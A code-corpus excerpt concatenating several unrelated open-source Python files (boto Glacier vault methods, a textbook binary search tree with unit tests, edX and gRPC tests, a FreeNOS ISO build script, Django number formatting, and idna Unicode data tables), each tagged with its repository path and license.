:param start_date: Beginning of the date range to query.
:type end_date: DateTime
:param end_date: End of the date range to query.
:type limit: int
:param limit: Limits the number of results returned.
:rtype: :class:`boto.glacier.job.Job`
:return: A Job object representing the retrieval job.
"""
job_id = self.retrieve_inventory(**kwargs)
return self.get_job(job_id)
def delete_archive(self, archive_id):
"""
This operation deletes an archive from the vault.
:type archive_id: str
:param archive_id: The ID for the archive to be deleted.
"""
return self.layer1.delete_archive(self.name, archive_id)
def get_job(self, job_id):
"""
Get an object representing a job in progress.
:type job_id: str
:param job_id: The ID of the job
:rtype: :class:`boto.glacier.job.Job`
:return: A Job object representing the job.
"""
response_data = self.layer1.describe_job(self.name, job_id)
return Job(self, response_data)
def list_jobs(self, completed=None, status_code=None):
"""
Return a list of Job objects related to this vault.
:type completed: boolean
:param completed: Specifies the state of the jobs to return.
If a value of True is passed, only completed jobs will
be returned. If a value of False is passed, only
uncompleted jobs will be returned. If no value is
passed, all jobs will be returned.
:type status_code: string
:param status_code: Specifies the type of job status to return.
Valid values are: InProgress|Succeeded|Failed. If not
specified, jobs with all status codes are returned.
:rtype: list of :class:`boto.glacier.job.Job`
:return: A list of Job objects related to this vault.
"""
response_data = self.layer1.list_jobs(self.name, completed,
status_code)
return [Job(self, jd) for jd in response_data['JobList']]
def list_all_parts(self, upload_id):
"""Automatically make and combine multiple calls to list_parts.
Call list_parts as necessary, combining the results in case multiple
calls were required to get data on all available parts.
"""
result = self.layer1.list_parts(self.name, upload_id)
marker = result['Marker']
while marker:
additional_result = self.layer1.list_parts(
self.name, upload_id, marker=marker)
result['Parts'].extend(additional_result['Parts'])
marker = additional_result['Marker']
# The marker makes no sense in an unpaginated result, and clearing it
# makes testing easier. This also has the nice property that the result
# is a normal (but expanded) response.
result['Marker'] = None
return result
| apache-2.0 |
RanmaRaj/Tak-tivity | pythonds/trees/bst.py | 7 | 18324 | #!/bin/env python3.1
# Bradley N. Miller, David L. Ranum
# Introduction to Data Structures and Algorithms in Python
# Copyright 2005, 2010
#
import unittest
class BinarySearchTree:
'''
Author: Brad Miller
Date: 1/15/2005
Description: Imlement a binary search tree with the following interface
functions:
__contains__(y) <==> y in x
__getitem__(y) <==> x[y]
__init__()
__len__() <==> len(x)
__setitem__(k,v) <==> x[k] = v
clear()
get(k)
items()
keys()
values()
put(k,v)
in
del <==>
'''
def __init__(self):
self.root = None
self.size = 0
def put(self,key,val):
if self.root:
self._put(key,val,self.root)
else:
self.root = TreeNode(key,val)
self.size = self.size + 1
def _put(self,key,val,currentNode):
if key < currentNode.key:
if currentNode.hasLeftChild():
self._put(key,val,currentNode.leftChild)
else:
currentNode.leftChild = TreeNode(key,val,parent=currentNode)
else:
if currentNode.hasRightChild():
self._put(key,val,currentNode.rightChild)
else:
currentNode.rightChild = TreeNode(key,val,parent=currentNode)
def __setitem__(self,k,v):
self.put(k,v)
def get(self,key):
if self.root:
res = self._get(key,self.root)
if res:
return res.payload
else:
return None
else:
return None
def _get(self,key,currentNode):
if not currentNode:
return None
elif currentNode.key == key:
return currentNode
elif key < currentNode.key:
return self._get(key,currentNode.leftChild)
else:
return self._get(key,currentNode.rightChild)
def __getitem__(self,key):
res = self.get(key)
if res:
return res
else:
raise KeyError('Error, key not in tree')
def __contains__(self,key):
if self._get(key,self.root):
return True
else:
return False
def length(self):
return self.size
def __len__(self):
return self.size
def __iter__(self):
return self.root.__iter__()
def delete(self,key):
if self.size > 1:
nodeToRemove = self._get(key,self.root)
if nodeToRemove:
self.remove(nodeToRemove)
self.size = self.size-1
else:
raise KeyError('Error, key not in tree')
elif self.size == 1 and self.root.key == key:
self.root = None
self.size = self.size - 1
else:
raise KeyError('Error, key not in tree')
def __delitem__(self,key):
self.delete(key)
def remove(self,currentNode):
if currentNode.isLeaf(): #leaf
if currentNode == currentNode.parent.leftChild:
currentNode.parent.leftChild = None
else:
currentNode.parent.rightChild = None
elif currentNode.hasBothChildren(): #interior
succ = currentNode.findSuccessor()
succ.spliceOut()
currentNode.key = succ.key
currentNode.payload = succ.payload
else: # this node has one child
if currentNode.hasLeftChild():
if currentNode.isLeftChild():
currentNode.leftChild.parent = currentNode.parent
currentNode.parent.leftChild = currentNode.leftChild
elif currentNode.isRightChild():
currentNode.leftChild.parent = currentNode.parent
currentNode.parent.rightChild = currentNode.leftChild
else:
currentNode.replaceNodeData(currentNode.leftChild.key,
currentNode.leftChild.payload,
currentNode.leftChild.leftChild,
currentNode.leftChild.rightChild)
else:
if currentNode.isLeftChild():
currentNode.rightChild.parent = currentNode.parent
currentNode.parent.leftChild = currentNode.rightChild
elif currentNode.isRightChild():
currentNode.rightChild.parent = currentNode.parent
currentNode.parent.rightChild = currentNode.rightChild
else:
currentNode.replaceNodeData(currentNode.rightChild.key,
currentNode.rightChild.payload,
currentNode.rightChild.leftChild,
currentNode.rightChild.rightChild)
def inorder(self):
self._inorder(self.root)
def _inorder(self,tree):
if tree != None:
self._inorder(tree.leftChild)
print(tree.key)
self._inorder(tree.rightChild)
def postorder(self):
self._postorder(self.root)
def _postorder(self, tree):
if tree:
self._postorder(tree.rightChild)
self._postorder(tree.leftChild)
print(tree.key)
def preorder(self):
self._preorder(self,self.root)
def _preorder(self,tree):
if tree:
print(tree.key)
self._preorder(tree.leftChild)
self._preorder(tree.rightChild)
class TreeNode:
def __init__(self,key,val,left=None,right=None,parent=None):
self.key = key
self.payload = val
self.leftChild = left
self.rightChild = right
self.parent = parent
self.balanceFactor = 0
def hasLeftChild(self):
return self.leftChild
def hasRightChild(self):
return self.rightChild
def isLeftChild(self):
return self.parent and self.parent.leftChild == self
def isRightChild(self):
return self.parent and self.parent.rightChild == self
def isRoot(self):
return not self.parent
def isLeaf(self):
return not (self.rightChild or self.leftChild)
def hasAnyChildren(self):
return self.rightChild or self.leftChild
def hasBothChildren(self):
return self.rightChild and self.leftChild
def replaceNodeData(self,key,value,lc,rc):
self.key = key
self.payload = value
self.leftChild = lc
self.rightChild = rc
if self.hasLeftChild():
self.leftChild.parent = self
if self.hasRightChild():
self.rightChild.parent = self
def findSuccessor(self):
succ = None
if self.hasRightChild():
succ = self.rightChild.findMin()
else:
if self.parent:
if self.isLeftChild():
succ = self.parent
else:
self.parent.rightChild = None
succ = self.parent.findSuccessor()
self.parent.rightChild = self
return succ
def spliceOut(self):
if self.isLeaf():
if self.isLeftChild():
self.parent.leftChild = None
else:
self.parent.rightChild = None
elif self.hasAnyChildren():
if self.hasLeftChild():
if self.isLeftChild():
self.parent.leftChild = self.leftChild
else:
self.parent.rightChild = self.leftChild
self.leftChild.parent = self.parent
else:
if self.isLeftChild():
self.parent.leftChild = self.rightChild
else:
self.parent.rightChild = self.rightChild
self.rightChild.parent = self.parent
def findMin(self):
current = self
while current.hasLeftChild():
current = current.leftChild
return current
def __iter__(self):
"""The standard inorder traversal of a binary tree."""
if self:
if self.hasLeftChild():
for elem in self.leftChild:
yield elem
yield self.key
if self.hasRightChild():
for elem in self.rightChild:
yield elem
class BinaryTreeTests(unittest.TestCase):
def setUp(self):
self.bst = BinarySearchTree()
def testgetput(self):
print('testgetput')
self.bst.put(50,'a')
self.bst.put(10,'b')
self.bst.put(70,'c')
self.bst.put(30,'d')
self.bst.put(85,'d')
self.bst.put(15,'e')
self.bst.put(45,'f')
print(self.bst.get(50))
assert self.bst.get(50) == 'a'
assert self.bst.get(45) == 'f'
assert self.bst.get(85) == 'd'
assert self.bst.get(10) == 'b'
assert self.bst.root.key == 50
assert self.bst.root.leftChild.key == 10
assert self.bst.root.rightChild.key == 70
def testputoper(self):
print('testputoper')
self.bst[25] = 'g'
assert self.bst[25] == 'g'
def testFindSucc(self):
print('testing findSucc')
x = BinarySearchTree()
x.put(10,'a')
x.put(15,'b')
x.put(6,'c')
x.put(2,'d')
x.put(8,'e')
x.put(9,'f')
assert x.root.leftChild.leftChild.findSuccessor().key == 6
assert x.root.leftChild.rightChild.findSuccessor().key == 9
assert x.root.leftChild.rightChild.rightChild.findSuccessor().key == 10
def testSize(self):
print('testing testSize')
self.bst.put(50,'a')
self.bst.put(10,'b')
self.bst.put(70,'c')
self.bst.put(30,'d')
self.bst.put(85,'d')
self.bst.put(15,'e')
self.bst.put(45,'f')
assert self.bst.length() == 7
def testDelete(self):
print('testing delete')
self.bst.put(50,'a')
self.bst.put(10,'b')
self.bst.put(70,'c')
self.bst.put(30,'d')
self.bst.put(85,'d')
self.bst.put(15,'e')
self.bst.put(45,'f')
self.bst.put(5,'g')
print('initial inorder')
self.bst.inorder()
assert (10 in self.bst) == True
self.bst.delete_key(10)
print('delete 10 inorder')
self.bst.inorder()
assert (10 in self.bst) == False
assert self.bst.root.leftChild.key == 15
assert self.bst.root.leftChild.parent == self.bst.root
assert self.bst.root.leftChild.rightChild.parent == self.bst.root.leftChild
assert self.bst.get(30) == 'd'
self.bst.delete_key(15)
print('delete 15 inorder')
self.bst.inorder()
assert self.bst.root.leftChild.key == 30
assert self.bst.root.leftChild.rightChild.key == 45
assert self.bst.root.leftChild.rightChild.parent == self.bst.root.leftChild
self.bst.delete_key(70)
print('delete 70 inorder')
self.bst.inorder()
assert (85 in self.bst) == True
assert self.bst.get(30) == 'd'
print('root key = ', self.bst.root.key)
print('left = ',self.bst.root.leftChild.key)
print('left left = ',self.bst.root.leftChild.leftChild.key)
print('left right = ',self.bst.root.leftChild.rightChild.key)
print('right = ',self.bst.root.rightChild.key)
self.bst.delete_key(50)
assert self.bst.root.key == 85
assert self.bst.root.leftChild.key == 30
assert self.bst.root.rightChild == None
assert self.bst.root.leftChild.leftChild.key == 5
assert self.bst.root.leftChild.rightChild.key == 45
assert self.bst.root.leftChild.leftChild.parent == self.bst.root.leftChild
assert self.bst.root.leftChild.rightChild.parent == self.bst.root.leftChild
print('new root key = ', self.bst.root.key)
self.bst.inorder()
self.bst.delete_key(45)
assert self.bst.root.leftChild.key == 30
self.bst.delete_key(85)
assert self.bst.root.key == 30
print('xxxx ',self.bst.root.leftChild.parent.key, self.bst.root.key)
assert self.bst.root.leftChild.parent == self.bst.root
self.bst.delete_key(30)
assert self.bst.root.key == 5
self.bst.inorder()
print("final root = " + str(self.bst.root.key))
assert self.bst.root.key == 5
self.bst.delete_key(5)
assert self.bst.root == None
def testDel2(self):
self.bst.put(21,'a')
self.bst.put(10,'b')
self.bst.put(24,'c')
self.bst.put(11,'d')
self.bst.put(22,'d')
self.bst.delete_key(10)
assert self.bst.root.leftChild.key == 11
assert self.bst.root.leftChild.parent == self.bst.root
assert self.bst.root.rightChild.key == 24
self.bst.delete_key(24)
assert self.bst.root.rightChild.key == 22
assert self.bst.root.rightChild.parent == self.bst.root
self.bst.delete_key(22)
self.bst.delete_key(21)
print("del2 root = ",self.bst.root.key)
assert self.bst.root.key == 11
assert self.bst.root.leftChild == None
assert self.bst.root.rightChild == None
def testLarge(self):
import random
print('testing a large random tree')
i = 0
randList = []
while i < 10000:
nrand = random.randrange(1,10000000)
if nrand not in randList:
randList.append(nrand)
i += 1
print(randList)
for n in randList:
self.bst.put(n,n)
sortList = randList[:]
sortList.sort()
random.shuffle(randList)
for n in randList:
minNode = self.bst.root.findMin()
if minNode:
assert minNode.key == sortList[0]
rootPos = sortList.index(self.bst.root.key)
succ = self.bst.root.findSuccessor()
if succ:
assert succ.key == sortList[rootPos+1]
else:
assert self.bst.root.rightChild == None
self.bst.delete_key(n)
sortList.remove(n)
assert self.bst.root == None
def testIter(self):
import random
i = 0
randList = []
while i < 100:
nrand = random.randrange(1,10000)
if nrand not in randList:
randList.append(nrand)
i += 1
for n in randList:
self.bst.put(n,n)
sortList = randList[:]
sortList.sort()
i = 0
for j in self.bst:
assert j == sortList[i]
i += 1
# the following exercises all of the branches in deleting a node with one child
def testCase1(self):
self.bst.put(10,10)
self.bst.put(7,7)
self.bst.put(5,5)
self.bst.put(1,1)
self.bst.put(6,6)
self.bst.delete_key(7)
assert self.bst.root.leftChild.key == 5
assert self.bst.root == self.bst.root.leftChild.parent
assert self.bst.root.leftChild.leftChild.key == 1
assert self.bst.root.leftChild.rightChild.key == 6
def testCase2(self):
self.bst = BinarySearchTree()
self.bst.put(10,10)
self.bst.put(15,15)
self.bst.put(12,12)
self.bst.put(11,11)
self.bst.put(13,13)
self.bst.delete_key(15)
assert self.bst.root.rightChild.key == 12
assert self.bst.root.rightChild.parent == self.bst.root
assert self.bst.root.rightChild.leftChild.key == 11
assert self.bst.root.rightChild.rightChild.key == 13
def testCase3(self):
self.bst = BinarySearchTree()
self.bst.put(10,10)
self.bst.put(6,6)
self.bst.put(8,8)
self.bst.put(7,7)
self.bst.put(9,9)
self.bst.delete_key(6)
assert self.bst.root.leftChild.key == 8
assert self.bst.root.leftChild.parent == self.bst.root
assert self.bst.root.leftChild.leftChild.key == 7
assert self.bst.root.leftChild.rightChild.key == 9
def testCase4(self):
self.bst = BinarySearchTree()
self.bst.put(10,10)
self.bst.put(15,15)
self.bst.put(20,20)
self.bst.put(17,17)
self.bst.put(22,22)
self.bst.delete_key(15)
assert self.bst.root.rightChild.key == 20
assert self.bst.root.rightChild.parent == self.bst.root
assert self.bst.root.rightChild.rightChild.key == 22
assert self.bst.root.rightChild.leftChild.key == 17
def testCase5(self):
self.bst.put(10,10)
self.bst.put(20,20)
self.bst.put(17,17)
self.bst.put(22,22)
self.bst.delete_key(10)
assert self.bst.root.key == 20
assert self.bst.root.leftChild.parent == self.bst.root
assert self.bst.root.rightChild.parent == self.bst.root
assert self.bst.root.leftChild.key == 17
assert self.bst.root.rightChild.key == 22
def testCase6(self):
self.bst.put(10,10)
self.bst.put(5,5)
self.bst.put(1,1)
self.bst.put(7,7)
self.bst.delete_key(10)
assert self.bst.root.key == 5
assert self.bst.root.leftChild.parent == self.bst.root
assert self.bst.root.rightChild.parent == self.bst.root
assert self.bst.root.leftChild.key == 1
assert self.bst.root.rightChild.key == 7
def testBadDelete(self):
self.bst.put(10,10)
with self.assertRaises(KeyError):
self.bst.delete_key(5)
self.bst.delete_key(10)
with self.assertRaises(KeyError):
self.bst.delete_key(5)
if __name__ == '__main__':
import platform
print(platform.python_version())
unittest.main()
### Local Variables:
### End:
| apache-2.0 |
marcore/edx-platform | common/djangoapps/microsite_configuration/tests/test_admin.py | 46 | 1635 | """
Tests for microsite admin
"""
from django.contrib.admin.sites import AdminSite
from django.http import HttpRequest
from microsite_configuration.admin import MicrositeAdmin
from microsite_configuration.models import Microsite
from microsite_configuration.tests.tests import DatabaseMicrositeTestCase
class MicrositeAdminTests(DatabaseMicrositeTestCase):
"""
Test class for MicrositeAdmin
"""
def setUp(self):
super(MicrositeAdminTests, self).setUp()
self.adminsite = AdminSite()
self.microsite_admin = MicrositeAdmin(Microsite, self.adminsite)
self.request = HttpRequest()
def test_fields_in_admin_form(self):
"""
Tests presence of form fields for Microsite.
"""
microsite_form = self.microsite_admin.get_form(self.request, self.microsite)
self.assertEqual(
list(microsite_form.base_fields),
["site", "key", "values"]
)
def test_save_action_admin_form(self):
"""
Tests save action for Microsite model form.
"""
new_values = {
"domain_prefix": "test-site-new",
"platform_name": "Test Site New"
}
microsite_form = self.microsite_admin.get_form(self.request)(instance=self.microsite, data={
"key": self.microsite.key,
"site": self.microsite.site.id,
"values": new_values,
})
self.assertTrue(microsite_form.is_valid())
microsite_form.save()
new_microsite = Microsite.objects.get(key=self.microsite.key)
self.assertEqual(new_microsite.values, new_values)
| agpl-3.0 |
stanley-cheung/grpc | src/python/grpcio_tests/tests/unit/_server_shutdown_scenarios.py | 18 | 2916 | # Copyright 2018 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines a number of module-scope gRPC scenarios to test server shutdown."""
import argparse
import os
import threading
import time
import logging
import grpc
from tests.unit import test_common
from concurrent import futures
from six.moves import queue
WAIT_TIME = 1000
REQUEST = b'request'
RESPONSE = b'response'
SERVER_RAISES_EXCEPTION = 'server_raises_exception'
SERVER_DEALLOCATED = 'server_deallocated'
SERVER_FORK_CAN_EXIT = 'server_fork_can_exit'
FORK_EXIT = '/test/ForkExit'
def fork_and_exit(request, servicer_context):
pid = os.fork()
if pid == 0:
os._exit(0)
return RESPONSE
class GenericHandler(grpc.GenericRpcHandler):
def service(self, handler_call_details):
if handler_call_details.method == FORK_EXIT:
return grpc.unary_unary_rpc_method_handler(fork_and_exit)
else:
return None
def run_server(port_queue):
server = test_common.test_server()
port = server.add_insecure_port('[::]:0')
port_queue.put(port)
server.add_generic_rpc_handlers((GenericHandler(),))
server.start()
# threading.Event.wait() does not exhibit the bug identified in
# https://github.com/grpc/grpc/issues/17093, sleep instead
time.sleep(WAIT_TIME)
def run_test(args):
if args.scenario == SERVER_RAISES_EXCEPTION:
server = test_common.test_server()
server.start()
raise Exception()
elif args.scenario == SERVER_DEALLOCATED:
server = test_common.test_server()
server.start()
server.__del__()
while server._state.stage != grpc._server._ServerStage.STOPPED:
pass
elif args.scenario == SERVER_FORK_CAN_EXIT:
port_queue = queue.Queue()
thread = threading.Thread(target=run_server, args=(port_queue,))
thread.daemon = True
thread.start()
port = port_queue.get()
channel = grpc.insecure_channel('localhost:%d' % port)
multi_callable = channel.unary_unary(FORK_EXIT)
result, call = multi_callable.with_call(REQUEST, wait_for_ready=True)
os.wait()
else:
raise ValueError('unknown test scenario')
if __name__ == '__main__':
logging.basicConfig()
parser = argparse.ArgumentParser()
parser.add_argument('scenario', type=str)
args = parser.parse_args()
run_test(args)
| apache-2.0 |
zpfang/FreeNOS | site_scons/iso.py | 3 | 1803 | #
# Copyright (C) 2010 Niek Linnenbank
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import os
import tempfile
import shutil
#
# Generate a bootable ISO image.
#
def iso_func(target, source, env):
# Create a temporary directory.
temp = tempfile.mkdtemp()
# Copy required files to temp directory.
for s in source:
shutil.copy(str(s), temp)
# Temporary workaround for x86/pc. Place grub menu.lst in /boot/grub.
os.makedirs(temp + '/boot/grub')
shutil.copy('kernel/x86/pc/menu.lst', temp + '/boot/grub')
# Generate the ISO.
os.system('mkisofs -quiet -R -b stage2_eltorito -no-emul-boot ' +
'-boot-load-size 4 -boot-info-table -o ' + str(target[0]) +
' -V "FreeNOS ' + env['RELEASE'] + '" ' + temp);
# Clean up temporary directory.
shutil.rmtree(temp);
#
# String command representation for ISO builder.
#
def iso_str(target, source, env):
return " ISO " + str(target[0])
#
# Add ourselves to the given environment.
#
def generate(env):
builder = env.Builder(action = env.Action(iso_func, iso_str))
env.Append(BUILDERS = { 'ISO' : builder })
#
# We always exist.
#
def exists(env):
return Env.Detect('mkisofs')
| gpl-3.0 |
holmes/intellij-community | python/lib/Lib/site-packages/django/utils/numberformat.py | 290 | 1632 | from django.conf import settings
from django.utils.safestring import mark_safe
def format(number, decimal_sep, decimal_pos, grouping=0, thousand_sep=''):
"""
Gets a number (as a number or string), and returns it as a string,
using formats definied as arguments:
* decimal_sep: Decimal separator symbol (for example ".")
* decimal_pos: Number of decimal positions
* grouping: Number of digits in every group limited by thousand separator
* thousand_sep: Thousand separator symbol (for example ",")
"""
use_grouping = settings.USE_L10N and \
settings.USE_THOUSAND_SEPARATOR and grouping
# Make the common case fast:
if isinstance(number, int) and not use_grouping and not decimal_pos:
return mark_safe(unicode(number))
# sign
if float(number) < 0:
sign = '-'
else:
sign = ''
str_number = unicode(number)
if str_number[0] == '-':
str_number = str_number[1:]
# decimal part
if '.' in str_number:
int_part, dec_part = str_number.split('.')
if decimal_pos:
dec_part = dec_part[:decimal_pos]
else:
int_part, dec_part = str_number, ''
if decimal_pos:
dec_part = dec_part + ('0' * (decimal_pos - len(dec_part)))
if dec_part: dec_part = decimal_sep + dec_part
# grouping
if use_grouping:
int_part_gd = ''
for cnt, digit in enumerate(int_part[::-1]):
if cnt and not cnt % grouping:
int_part_gd += thousand_sep
int_part_gd += digit
int_part = int_part_gd[::-1]
return sign + int_part + dec_part
| apache-2.0 |
gimite/personfinder | app/vendors/idna/idnadata.py | 63 | 40899 | # This file is automatically generated by tools/idna-data
__version__ = "11.0.0"
scripts = {
'Greek': (
0x37000000374,
0x37500000378,
0x37a0000037e,
0x37f00000380,
0x38400000385,
0x38600000387,
0x3880000038b,
0x38c0000038d,
0x38e000003a2,
0x3a3000003e2,
0x3f000000400,
0x1d2600001d2b,
0x1d5d00001d62,
0x1d6600001d6b,
0x1dbf00001dc0,
0x1f0000001f16,
0x1f1800001f1e,
0x1f2000001f46,
0x1f4800001f4e,
0x1f5000001f58,
0x1f5900001f5a,
0x1f5b00001f5c,
0x1f5d00001f5e,
0x1f5f00001f7e,
0x1f8000001fb5,
0x1fb600001fc5,
0x1fc600001fd4,
0x1fd600001fdc,
0x1fdd00001ff0,
0x1ff200001ff5,
0x1ff600001fff,
0x212600002127,
0xab650000ab66,
0x101400001018f,
0x101a0000101a1,
0x1d2000001d246,
),
'Han': (
0x2e8000002e9a,
0x2e9b00002ef4,
0x2f0000002fd6,
0x300500003006,
0x300700003008,
0x30210000302a,
0x30380000303c,
0x340000004db6,
0x4e0000009ff0,
0xf9000000fa6e,
0xfa700000fada,
0x200000002a6d7,
0x2a7000002b735,
0x2b7400002b81e,
0x2b8200002cea2,
0x2ceb00002ebe1,
0x2f8000002fa1e,
),
'Hebrew': (
0x591000005c8,
0x5d0000005eb,
0x5ef000005f5,
0xfb1d0000fb37,
0xfb380000fb3d,
0xfb3e0000fb3f,
0xfb400000fb42,
0xfb430000fb45,
0xfb460000fb50,
),
'Hiragana': (
0x304100003097,
0x309d000030a0,
0x1b0010001b11f,
0x1f2000001f201,
),
'Katakana': (
0x30a1000030fb,
0x30fd00003100,
0x31f000003200,
0x32d0000032ff,
0x330000003358,
0xff660000ff70,
0xff710000ff9e,
0x1b0000001b001,
),
}
joining_types = {
0x600: 85,
0x601: 85,
0x602: 85,
0x603: 85,
0x604: 85,
0x605: 85,
0x608: 85,
0x60b: 85,
0x620: 68,
0x621: 85,
0x622: 82,
0x623: 82,
0x624: 82,
0x625: 82,
0x626: 68,
0x627: 82,
0x628: 68,
0x629: 82,
0x62a: 68,
0x62b: 68,
0x62c: 68,
0x62d: 68,
0x62e: 68,
0x62f: 82,
0x630: 82,
0x631: 82,
0x632: 82,
0x633: 68,
0x634: 68,
0x635: 68,
0x636: 68,
0x637: 68,
0x638: 68,
0x639: 68,
0x63a: 68,
0x63b: 68,
0x63c: 68,
0x63d: 68,
0x63e: 68,
0x63f: 68,
0x640: 67,
0x641: 68,
0x642: 68,
0x643: 68,
0x644: 68,
0x645: 68,
0x646: 68,
0x647: 68,
0x648: 82,
0x649: 68,
0x64a: 68,
0x66e: 68,
0x66f: 68,
0x671: 82,
0x672: 82,
0x673: 82,
0x674: 85,
0x675: 82,
0x676: 82,
0x677: 82,
0x678: 68,
0x679: 68,
0x67a: 68,
0x67b: 68,
0x67c: 68,
0x67d: 68,
0x67e: 68,
0x67f: 68,
0x680: 68,
0x681: 68,
0x682: 68,
0x683: 68,
0x684: 68,
0x685: 68,
0x686: 68,
0x687: 68,
0x688: 82,
0x689: 82,
0x68a: 82,
0x68b: 82,
0x68c: 82,
0x68d: 82,
0x68e: 82,
0x68f: 82,
0x690: 82,
0x691: 82,
0x692: 82,
0x693: 82,
0x694: 82,
0x695: 82,
0x696: 82,
0x697: 82,
0x698: 82,
0x699: 82,
0x69a: 68,
0x69b: 68,
0x69c: 68,
0x69d: 68,
0x69e: 68,
0x69f: 68,
0x6a0: 68,
0x6a1: 68,
0x6a2: 68,
0x6a3: 68,
0x6a4: 68,
0x6a5: 68,
0x6a6: 68,
0x6a7: 68,
0x6a8: 68,
0x6a9: 68,
0x6aa: 68,
0x6ab: 68,
0x6ac: 68,
0x6ad: 68,
0x6ae: 68,
0x6af: 68,
0x6b0: 68,
0x6b1: 68,
0x6b2: 68,
0x6b3: 68,
0x6b4: 68,
0x6b5: 68,
0x6b6: 68,
0x6b7: 68,
0x6b8: 68,
0x6b9: 68,
0x6ba: 68,
0x6bb: 68,
0x6bc: 68,
0x6bd: 68,
0x6be: 68,
0x6bf: 68,
0x6c0: 82,
0x6c1: 68,
0x6c2: 68,
0x6c3: 82,
0x6c4: 82,
0x6c5: 82,
0x6c6: 82,
0x6c7: 82,
0x6c8: 82,
0x6c9: 82,
0x6ca: 82,
0x6cb: 82,
0x6cc: 68,
0x6cd: 82,
0x6ce: 68,
0x6cf: 82,
0x6d0: 68,
0x6d1: 68,
0x6d2: 82,
0x6d3: 82,
0x6d5: 82,
0x6dd: 85,
0x6ee: 82,
0x6ef: 82,
0x6fa: 68,
0x6fb: 68,
0x6fc: 68,
0x6ff: 68,
0x70f: 84,
0x710: 82,
0x712: 68,
0x713: 68,
0x714: 68,
0x715: 82,
0x716: 82,
0x717: 82,
0x718: 82,
0x719: 82,
0x71a: 68,
0x71b: 68,
0x71c: 68,
0x71d: 68,
0x71e: 82,
0x71f: 68,
0x720: 68,
0x721: 68,
0x722: 68,
0x723: 68,
0x724: 68,
0x725: 68,
0x726: 68,
0x727: 68,
0x728: 82,
0x729: 68,
0x72a: 82,
0x72b: 68,
0x72c: 82,
0x72d: 68,
0x72e: 68,
0x72f: 82,
0x74d: 82,
0x74e: 68,
0x74f: 68,
0x750: 68,
0x751: 68,
0x752: 68,
0x753: 68,
0x754: 68,
0x755: 68,
0x756: 68,
0x757: 68,
0x758: 68,
0x759: 82,
0x75a: 82,
0x75b: 82,
0x75c: 68,
0x75d: 68,
0x75e: 68,
0x75f: 68,
0x760: 68,
0x761: 68,
0x762: 68,
0x763: 68,
0x764: 68,
0x765: 68,
0x766: 68,
0x767: 68,
0x768: 68,
0x769: 68,
0x76a: 68,
0x76b: 82,
0x76c: 82,
0x76d: 68,
0x76e: 68,
0x76f: 68,
0x770: 68,
0x771: 82,
0x772: 68,
0x773: 82,
0x774: 82,
0x775: 68,
0x776: 68,
0x777: 68,
0x778: 82,
0x779: 82,
0x77a: 68,
0x77b: 68,
0x77c: 68,
0x77d: 68,
0x77e: 68,
0x77f: 68,
0x7ca: 68,
0x7cb: 68,
0x7cc: 68,
0x7cd: 68,
0x7ce: 68,
0x7cf: 68,
0x7d0: 68,
0x7d1: 68,
0x7d2: 68,
0x7d3: 68,
0x7d4: 68,
0x7d5: 68,
0x7d6: 68,
0x7d7: 68,
0x7d8: 68,
0x7d9: 68,
0x7da: 68,
0x7db: 68,
0x7dc: 68,
0x7dd: 68,
0x7de: 68,
0x7df: 68,
0x7e0: 68,
0x7e1: 68,
0x7e2: 68,
0x7e3: 68,
0x7e4: 68,
0x7e5: 68,
0x7e6: 68,
0x7e7: 68,
0x7e8: 68,
0x7e9: 68,
0x7ea: 68,
0x7fa: 67,
0x840: 82,
0x841: 68,
0x842: 68,
0x843: 68,
0x844: 68,
0x845: 68,
0x846: 82,
0x847: 82,
0x848: 68,
0x849: 82,
0x84a: 68,
0x84b: 68,
0x84c: 68,
0x84d: 68,
0x84e: 68,
0x84f: 68,
0x850: 68,
0x851: 68,
0x852: 68,
0x853: 68,
0x854: 82,
0x855: 68,
0x856: 85,
0x857: 85,
0x858: 85,
0x860: 68,
0x861: 85,
0x862: 68,
0x863: 68,
0x864: 68,
0x865: 68,
0x866: 85,
0x867: 82,
0x868: 68,
0x869: 82,
0x86a: 82,
0x8a0: 68,
0x8a1: 68,
0x8a2: 68,
0x8a3: 68,
0x8a4: 68,
0x8a5: 68,
0x8a6: 68,
0x8a7: 68,
0x8a8: 68,
0x8a9: 68,
0x8aa: 82,
0x8ab: 82,
0x8ac: 82,
0x8ad: 85,
0x8ae: 82,
0x8af: 68,
0x8b0: 68,
0x8b1: 82,
0x8b2: 82,
0x8b3: 68,
0x8b4: 68,
0x8b6: 68,
0x8b7: 68,
0x8b8: 68,
0x8b9: 82,
0x8ba: 68,
0x8bb: 68,
0x8bc: 68,
0x8bd: 68,
0x8e2: 85,
0x1806: 85,
0x1807: 68,
0x180a: 67,
0x180e: 85,
0x1820: 68,
0x1821: 68,
0x1822: 68,
0x1823: 68,
0x1824: 68,
0x1825: 68,
0x1826: 68,
0x1827: 68,
0x1828: 68,
0x1829: 68,
0x182a: 68,
0x182b: 68,
0x182c: 68,
0x182d: 68,
0x182e: 68,
0x182f: 68,
0x1830: 68,
0x1831: 68,
0x1832: 68,
0x1833: 68,
0x1834: 68,
0x1835: 68,
0x1836: 68,
0x1837: 68,
0x1838: 68,
0x1839: 68,
0x183a: 68,
0x183b: 68,
0x183c: 68,
0x183d: 68,
0x183e: 68,
0x183f: 68,
0x1840: 68,
0x1841: 68,
0x1842: 68,
0x1843: 68,
0x1844: 68,
0x1845: 68,
0x1846: 68,
0x1847: 68,
0x1848: 68,
0x1849: 68,
0x184a: 68,
0x184b: 68,
0x184c: 68,
0x184d: 68,
0x184e: 68,
0x184f: 68,
0x1850: 68,
0x1851: 68,
0x1852: 68,
0x1853: 68,
0x1854: 68,
0x1855: 68,
0x1856: 68,
0x1857: 68,
0x1858: 68,
0x1859: 68,
0x185a: 68,
0x185b: 68,
0x185c: 68,
0x185d: 68,
0x185e: 68,
0x185f: 68,
0x1860: 68,
0x1861: 68,
